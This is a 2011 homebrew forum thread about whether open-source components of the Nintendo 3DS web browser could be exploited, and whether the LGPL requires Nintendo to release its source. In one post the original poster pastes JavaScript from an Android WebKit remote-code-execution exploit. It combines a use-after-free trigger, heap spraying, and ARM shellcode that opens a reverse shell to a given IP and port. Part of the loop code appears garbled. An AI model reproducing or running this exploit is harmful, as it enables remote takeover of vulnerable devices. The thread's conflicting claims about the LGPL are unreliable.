Internet Browser built on open source software.

Discussion in '3DS - Flashcards & Custom Firmwares' started by LinkReincarnate, Jun 10, 2011.

  1. LinkReincarnate
    OP

    LinkReincarnate Member

    Newcomer
    10
    0
    Jun 10, 2011
    United States
    So if you look in your manual in the internet browser and select the last section you'll find that the internet browser (or at least components of it) is licensed as LGPL. One of the requirements of an LGPL license is that the source code must be made available. The manual says it is available on Nintendo's site but i can't seem to find it anywhere. This code may or may not have an exploitable weakness. (I know how to code but I am a newb at reverse engineering so i may be all wet on that point.) Anyone want to poke around on Nintendo's site to try and help me find it?
     


  2. ccfreak2k

    ccfreak2k Advanced Member

    Newcomer
    53
    0
    May 3, 2011
    United States
    It's almost certainly for one or more libraries, like libcurl. These kinds of libraries have been around a long time and have a very wide deployment, thus making them very well-tested.

    That is to say, the source code would be in one of the included libraries and not the actual browser itself.
     
  3. Spoom

    Spoom Newbie

    Newcomer
    8
    0
    Mar 30, 2009
    Canada
    If it's anything like the Wii, it's probably a compact version of Opera. Opera is not open source, so the person above is probably right; the code is likely to open source networking components, which have been examined by thousands of developer eyes over a long period of time. Finding an exploitable weakness in them is not likely.
     
  4. koloss

    koloss Newbie

    Newcomer
    6
    0
    Apr 8, 2011
    In 3dbrew we can see:

    The 3D Internet Browser is Netfront Browser NX v1.0 based on WebKit engine.
     
  5. Dash_2

    Dash_2 Hello I'm Dash!

    Member
    130
    17
    Jun 6, 2011
    Melbourne, Florida!

    yeah they ditched opera...

    they use the same browser as psp and ps3..
     
  6. Spoom

    Spoom Newbie

    Newcomer
    8
    0
    Mar 30, 2009
    Canada
    Ah, sorry. Same deal applies though, not an open source browser.
     
  7. smse

    smse Newbie

    Newcomer
    6
    0
    Apr 4, 2007
  8. Spoom

    Spoom Newbie

    Newcomer
    8
    0
    Mar 30, 2009
    Canada
    Ah, it's the source to WebKit.
     
  9. yifan_lu

    yifan_lu @yifanlu

    Member
    618
    1,225
    Apr 28, 2007
    United States
  10. Harakiri23

    Harakiri23 Member

    Newcomer
    25
    0
    Jun 28, 2007
    United States
    The OP is wrong, you dont need to release anything for L(Lesser) GPL - only for GPL based code
     
  11. Toad King

    Toad King GBAtemp Fan

    Member
    356
    271
    Aug 19, 2009
    United States
    Not entirely correct. If you make changes to LGPL code, you have to make the changes available.
     
  12. LinkReincarnate
    OP

    LinkReincarnate Member

    Newcomer
    10
    0
    Jun 10, 2011
    United States
  13. pachura

    pachura GBAtemp Advanced Fan

    Member
    566
    2
    Dec 9, 2006
    Sorry to be pessimistic, but:

    1. Usually, exploits work only for a specific OS, or at least for a specific CPU family (often, x86). Currently, no one even knows for sure what ARM sits there in 3DS...

    2. The browser is probably sandboxed and operates in an isolated memory area. After all, no one would like a bug in the browser to crash the suspended game...

    3. There'a a big chance 3DS' CPU uses special ARM extensions to counter stack/buffer overflow attacks.
     
  14. ccfreak2k

    ccfreak2k Advanced Member

    Newcomer
    53
    0
    May 3, 2011
    United States
    Doubtful. The cost for adding that kind of thing to the hardware would be greater than the gain from thwarting such attacks. It's possible that the software may be hardened (here's some examples), but ARM, being embedded, isn't really security-oriented. I'm putting my money on exploits being given only specific contextual access to the hardware.
     
  15. BlazerRazor

    BlazerRazor GBAtemp Regular

    Member
    136
    0
    Nov 21, 2005
    That's a completely wrong statement. Libraries licensed under LGPL does NOT require other thirds parties to hand over their code.
    That is why LGPL was made, to make developers able to use libraries, linking, without needing to share their code.

    Source; http://en.wikipedia.org/wiki/GNU_General_P...d_derived_works http://www.gnu.org/copyleft/lesser.html

    Also, your talk about weaknesses in code is also kinda invalid. The chance of exploitable holes is much slimmer when you consider it is released under LGPL -- people can freely view the code and identify holes. Also, it would be wise of Nintendo to run applications like the browser in some sort of "sandbox" environment, to make sure you can't exploit future holes.
     
  16. Harakiri23

    Harakiri23 Member

    Newcomer
    25
    0
    Jun 28, 2007
    United States
    That is just plain wrong, please do some research and learn about GPL vs LGPL - you can do what you want with LGPL code - no strings attached!
     
  17. LinkReincarnate
    OP

    LinkReincarnate Member

    Newcomer
    10
    0
    Jun 10, 2011
    United States
    For what it's worth Nintendo thinks that they have a requirement to host the code because they are. Whether that is really the case or whether someone at Nintendo f'ed up is irrelevant.
     
  18. LinkReincarnate
    OP

    LinkReincarnate Member

    Newcomer
    10
    0
    Jun 10, 2011
    United States
    It's a custom job that uses very large chunks of arm 9. Arm 9 is in all kinds of android phones and tablets. Any android exploits for webkit?
    Yup They even allow remote code execution. Will that work on the 3ds? Probably not but it does give a general idea of where vulnerabilities may lie and the methodlogies that should be used. BTW that exploit uses javascript. Here is the code for those who are interested.




    function heap()
    {

    var id = document.getElementById("target");
    var attribute = id.getAttributeNode('id');
    nodes = attribute.childNodes;
    document.body.removeChild(id);
    attribute.removeChild(nodes[0]);
    setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); };

    var scode = unescape("\u0060\u0060");
    var scode2 = unescape("\u5005\ue1a0");
    var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
    \u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
    shell += unescape("\uae08"); // Port = 2222
    shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
    shell += unescape("\u2000\u2000"); // string terminate

    do
    {
    scode += scode;
    scode2 += scode2;

    } while (scode.length250){
    // alert("freeze");
    nodes[0].textContent}

    }

    }, 0);
    }



    [/p]
     
  19. Masterpaul

    Masterpaul GBAtemp Regular

    Member
    140
    2
    Aug 13, 2009
    Greece
    What your gonna execute though in the 3ds? We dont have anything to execute.
     
  20. NES SNES V.B. N64 G.C. Wii WiiU

    NES SNES V.B. N64 G.C. Wii WiiU Now with extra redundancy!

    Member
    859
    99
    Feb 10, 2011
    The EoF
    There have been 3DS roms dumped recently. Search in GBAtemp search.